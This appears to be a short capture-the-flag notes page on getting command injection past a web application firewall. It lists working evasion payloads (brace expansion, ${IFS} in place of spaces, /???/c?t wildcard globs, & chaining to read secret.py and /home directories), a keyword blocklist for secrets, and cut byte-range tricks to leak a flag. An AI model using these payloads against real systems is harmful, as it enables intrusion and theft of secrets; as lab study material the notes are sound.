WAF

Char Evasion 'spaces'

{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt

/&pwd/&pwd
/var/task&{cat,secret.py}

{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}

Found this hiding behind ...  instead of . ..
{/var/task/...,-la}

WAF Wars

The bash shell allows wildcards.
These can be helpful to run commands that may be blocked by the WAF.
There are many functions that can manipulate text.
Try looking at the man pages for iconv or cut.

ls -la /secrets

$cmd = "ls -la /secrets" && $output = shell_exec($cmd);
$c=p $m=w $d=d && $output = shell_exec($c$m$d);

ls -la /secrets
/???/?s
/bin/ps

/???/?s /s?????s
"flag","f","l","a","g"
/???/??t 

$egress_ruleset = array("BLAB","{","}",
"flag","secret","password","ssn","confidential");

file
flag
password
pins
ssn

/???/??t ./pins
/???/c?t 
/???/?s         ..ls works
/???/e??o hi    ..echo works!!!
/???/c?t /s?????s/
/u??/???/?s   ..might be 'ls' ?
/u??/???/c?t   ..might be 'cat' ?
/u??/???/c?t -c1  /s????ts/????

Answer:
cut -b8-30

/u??/???/c?t -b1-5  /s????ts/????
/u??/???/c?t -b8-30  /s????ts/????

FLAG{waf_3vision_w1n}

PreviousSQLMap NextWebmin

Last updated 2 years ago

Was this helpful?

See Also:

Char Evasion 'spaces'

WAF Wars